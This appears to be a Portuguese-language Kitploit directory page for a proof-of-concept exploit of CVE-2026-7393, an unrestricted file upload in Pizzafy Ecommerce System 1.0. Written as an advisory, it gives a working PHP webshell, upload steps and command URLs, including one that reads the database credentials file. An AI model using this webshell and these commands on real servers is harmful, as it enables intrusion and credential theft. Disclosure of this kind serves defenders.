Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-7393-RCE — Exploit de prova de conceito para CVE-2026-7393: upload de arquivo irrestrito no Pizzafy Ecommerce System 1.0 permitindo que administradores autenticados façam upload de um webshell PHP e obtenham execução remota de código. | Kitploit
Ferramentas/GitHubGitHub/xmyronn/cve-2026-7393-rce
Geração de PayloadsAnálise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubxmyronn/cve-2026-7393-rce

CVE-2026-7393-RCE

Exploit de prova de conceito para CVE-2026-7393: upload de arquivo irrestrito no Pizzafy Ecommerce System 1.0 permitindo que administradores autenticados façam upload de um webshell PHP e obtenham execução remota de código.

Ver Repositório
há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Pizzafy Ecommerce System 1.0 – Upload de Arquivo sem Restrições em save_menu() Leva à Execução Remota de Código

Detalhes

CampoValor
FornecedorSourceCodester
URL do Fornecedorhttps://www.sourcecodester.com
ProdutoPizzafy Ecommerce System usando PHP e MySQL
URL do Produtohttps://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html
Versão1.0
VulnerabilidadeUpload de Arquivo sem Restrições → Execução Remota de Código
CWECWE-434
Pontuação CVSSv37.8 (Alta)
Vetor de AtaqueRede
Autenticação NecessáriaSim (Administrador)
Interação do UsuárioNenhuma
PesquisadorImad Alvi
Data2026-04-12

Componente Afetado

Arquivo: Pizzafy/admin/admin_class_novo.php → função save_menu()
Parâmetro: img (FILE)
Caminho de upload: Pizzafy/assets/img/


Descrição

A função save_menu() no Pizzafy Ecommerce System 1.0 lida com uploads de imagens para itens do menu sem realizar nenhuma validação de tipo de arquivo. A aplicação recupera a extensão do arquivo usando pathinfo(), mas nunca verifica ou restringe os tipos de arquivo permitidos antes de mover o arquivo enviado para o diretório acessível pela web assets/img/. Um administrador autenticado pode fazer upload de um webshell PHP disfarçado como uma imagem de menu, e então acessá-lo diretamente via navegador para obter Execução Remota de Código no servidor.

Código vulnerável em admin_class_novo.php:

root@kitploit:~
function save_menu(){
    extract($_POST);
    // ...
    if($_FILES['img']['tmp_name'] != ''){
        $fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
        $move = move_uploaded_file($_FILES['img']['tmp_name'],'../assets/img/'. $fname);
        $data .= ", img_path = '$fname' ";
    }
    // Nenhuma verificação de extensão, nenhuma verificação de tipo MIME
}

Prova de Conceito

Passo 1 — Criar Webshell PHP

Crie um arquivo chamado shell_web2.php com o seguinte conteúdo:

root@kitploit:~
<?php echo shell_exec($_GET['cmd']); ?>

Passo 2 — Enviar Webshell via Gerenciamento de Menu

Faça login como administrador e navegue para:

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php?page=menu

Preencha o Formulário de Menu com valores válidos e selecione shell_web2.php como o arquivo de Imagem. Clique em Salvar.

Captura de tela 2026-04-12 171202

O shell agora aparece como um item de menu na página voltada ao cliente.

Captura de tela 2026-04-12 171236

Passo 3 — Localizar o Shell Enviado

Navegue até o diretório assets — a listagem de diretórios está ativada (CWE-548):

root@kitploit:~
http://192.168.0.9/pizzafy/Pizzafy/assets/img/

O shell PHP enviado está visível na listagem de diretórios.

Captura de tela 2026-04-12 171300

Passo 4 — Executar Comandos Remotos

Acesse o shell enviado diretamente e passe comandos do sistema via parâmetro cmd:

root@kitploit:~
http://192.168.0.9/pizzafy/Pizzafy/assets/img/1775994120_shell_web2.php?cmd=whoami

Resposta — comando do SO executado no servidor:

root@kitploit:~
desktop-g1i9np3\dell
Captura de tela 2026-04-12 171313

Comandos Adicionais

root@kitploit:~
?cmd=whoami
?cmd=ipconfig
?cmd=dir C:\xampp\htdocs\pizzafy
?cmd=type C:\xampp\htdocs\pizzafy\Pizzafy\admin\db_connect.php

Impacto

Um administrador autenticado pode:

  • Enviar arquivos PHP arbitrários para o servidor web
  • Executar qualquer comando a nível de SO no servidor
  • Ler arquivos confidenciais, incluindo credenciais do banco de dados
  • Estabelecer um reverse shell para acesso persistente completo
  • Comprometer completamente o servidor subjacente

Nota sobre Listagem de Diretórios (CWE-548)

O diretório assets/img/ tem a listagem de diretórios ativada, permitindo que usuários não autenticados naveguem por todos os arquivos enviados, incluindo o webshell. Isso agrava a gravidade da vulnerabilidade de upload de arquivos.


Referências

  • SourceCodester — Pizzafy Ecommerce System
  • CWE-434: Upload sem Restrições de Arquivo com Tipo Perigoso
  • CWE-548: Exposição de Informações Através de Listagem de Diretórios
Baixar ferramenta